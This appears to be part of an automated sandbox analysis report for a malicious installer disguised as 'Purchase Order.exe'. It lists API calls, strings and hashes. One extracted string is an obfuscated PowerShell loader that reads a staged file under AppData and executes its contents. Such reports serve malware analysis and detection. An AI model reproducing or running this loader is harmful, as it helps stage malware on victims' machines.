                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                          • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                          • ShowWindow.USER32(00000000), ref: 00404EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                          • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                          • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                          • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                          • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                          • lstrcmpiA.KERNEL32(Execute: ,Misguidingly Setup: Installing), ref: 004044B9
                                                          • lstrcatA.KERNEL32(?,Execute: ), ref: 004044C5
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                            • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                            • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                          • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                            • Part of subcall function 00404709: lstrlenA.KERNEL32(Misguidingly Setup: Installing,Misguidingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                            • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                            • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Misguidingly Setup: Installing), ref: 004047C2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially, xrefs: 004044A2
                                                          • Execute: , xrefs: 004044B3, 004044B8, 004044C3
                                                          • A, xrefs: 00404475
                                                          • Misguidingly Setup: Installing, xrefs: 0040444F, 004044B2
                                                          • "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", xrefs: 0040436B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"$A$C:\Users\user\AppData\Local\potentially$Execute: $Misguidingly Setup: Installing
                                                          • API String ID: 2624150263-1258093842
                                                          • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                          • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                          • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                          • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                          APIs
                                                          • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                          Strings
                                                          • C:\Users\user\AppData\Local\potentially\Avantgarders, xrefs: 0040211D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Local\potentially\Avantgarders
                                                          • API String ID: 123533781-1472172179
                                                          • Opcode ID: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                          • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                          • Opcode Fuzzy Hash: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                          • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                          • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                          • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                          • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                          • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                          • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                          • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                          • GetSysColor.USER32(?), ref: 0040412B
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                          • lstrlenA.KERNEL32(?), ref: 0040414C
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                          • SendMessageA.USER32(00000000), ref: 004041D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                          • SetCursor.USER32(00000000), ref: 00404258
                                                          • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                          • SetCursor.USER32(00000000), ref: 0040427B
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: (@@$Execute: $N$open
                                                          • API String ID: 3615053054-1007250702
                                                          • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                          • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                          • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,Misguidingly Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$Misguidingly Setup
                                                          • API String ID: 941294808-3467345179
                                                          • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                          • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                          • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                          APIs
                                                          • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                          • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                          • wsprintfA.USER32 ref: 00405AEF
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                          • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004059A6
                                                            • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 222337774-4148678300
                                                          • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                          • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                          • Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                          • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                          • GetLastError.KERNEL32 ref: 00405465
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                          • GetLastError.KERNEL32 ref: 00405484
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                          • API String ID: 3449924974-891493705
                                                          • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                          • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                          • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                          • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                          Strings
                                                          • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 00405FD6
                                                          • *?|<>/":, xrefs: 00405FE2
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-4040796691
                                                          • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                          • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                          • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00403F98
• GetSysColor.USER32(00000000), ref: 00403FB4
• SetTextColor.GDI32(?,00000000), ref: 00403FC0
• SetBkMode.GDI32(?,?), ref: 00403FCC
• GetSysColor.USER32(?), ref: 00403FDF
• SetBkColor.GDI32(?,?), ref: 00403FEF
• DeleteObject.GDI32(?), ref: 00404009
• CreateBrushIndirect.GDI32(?), ref: 00404013
Memory Dump Source
• Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
• Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
• GetMessagePos.USER32 ref: 00404836
• ScreenToClient.USER32(?,?), ref: 00404850
• SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
Strings
Memory Dump Source
• Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
• Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
• Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
• Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
• MulDiv.KERNEL32(0008D02A,00000064,0008DA88), ref: 00402BC5
• wsprintfA.USER32 ref: 00402BD5
• SetWindowTextA.USER32(?,?), ref: 00402BE5
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
Strings
• verifying installer: %d%%, xrefs: 00402BCF
Memory Dump Source
• Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
• Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
• Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
• Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
APIs
• GetDC.USER32(?), ref: 00401D3B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
• ReleaseDC.USER32(?,00000000), ref: 00401D68
• CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Calibri
• API String ID: 3808545654-1409258342
• Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
• Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
• Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
• Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
• GlobalFree.KERNEL32(?), ref: 0040276F
• GlobalFree.KERNEL32(00000000), ref: 00402782
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
Memory Dump Source
• Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
• Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
• Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
• Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
APIs
• lstrlenA.KERNEL32(Misguidingly Setup: Installing,Misguidingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
• wsprintfA.USER32 ref: 004047AF
• SetDlgItemTextA.USER32(?,Misguidingly Setup: Installing), ref: 004047C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$Misguidingly Setup: Installing
• API String ID: 3540041739-273555568
• Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
• Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
• Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
• Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
APIs
• GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
